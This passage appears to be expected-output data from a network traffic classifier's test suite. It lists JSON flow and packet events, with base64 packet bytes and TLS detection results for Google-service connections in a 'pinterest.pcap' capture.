{"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} +00686{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} 
+00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAqmhACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyRABu5dQgwPxqZaUgBAHqUTfAAABAQgKOIhalcK4e5A="} 
+00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gA2s5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1CQBu69kJZnLb6S2gBAFvhEdAAABAQgKcHSqtcK4e5A="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAtTRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACAK3yoBu80FVZetwjn1gBAB9Q24AAABAQgKVxL7HMK4e4A="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14837,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718372,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbvebDafCFNTGykFgBALfUzsAAABAQgKwrkyWnReVSQ="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14838,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgMAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvfKq3COfXNBVWYgBALvWWfAAABAQgKwrkyYVcQ4ow="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14839,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJEPGplpSXUIMEgBALh6bdAAABAQgKwrkyYTiGPeg="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14840,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUJMtvpLavZCWagBAL1W6tAAABAQgKwrkyYnBykDw="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289720502,"flow_last_seen":1605289720502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289720502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605289720502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720502,"pkt":"qtsDr8lk5EKm5WPyht1gDE+lACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgIBuwZ3AS1n9K5wgBAD7qJGAAABAQgK1mI428K4iuQ="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14888,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720592,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWAmf0rnAGdwEugBAMdPzqAAABAQgKwrk63tZgJbc="} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722442,"flow_last_seen":1605289722442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722442,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605289722442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722442,"pkt":"qtsDr8lk5EKm5WPyht1gCa8jACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt0YBu4XaMRXguiMogBAB9ZuaAAABAQgKldeDu8K4iwE="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722610,"flow_last_seen":1605289722610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722610,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605289722610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722610,"pkt":"qtsDr8lk5EKm5WPyht1gDvD\/ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgYBu\/ADYY+SLdnAgBBf+pZ\/AAABAQgK1mJBF8K4kuY="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14891,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3RuC6IyiF2jEWgBAM4PFAAAABAQgKwrlC85XVazg="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14892,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722642,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWBpIt2cDwA2GQgBAQS035AAABAQgKwrlDCNZgKSs="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726574,"flow_last_seen":1605289726574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726574,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605289726574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726574,"pkt":"qtsDr8lk5EKm5WPyht1gD7DqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyPYBuy7xct5PemhygBASWTvxAAABAQgKOIh6ucK4opo="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726582,"flow_last_seen":1605289726582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726582,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605289726582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726582,"pkt":"qtsDr8lk5EKm5WPyht1gBy5HACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKukIBu0Ah3sUn+OyVgBAB9Rf+AAABAQgKqS9zVcK4oqI="} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14988,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvI9k96aHIu8XLfgBAL06eYAAABAQgKwrlSlDiGZZ4="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14989,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726637,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6Qif47JVAId7GgBALvHMdAAABAQgKwrlSpKktXm0="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
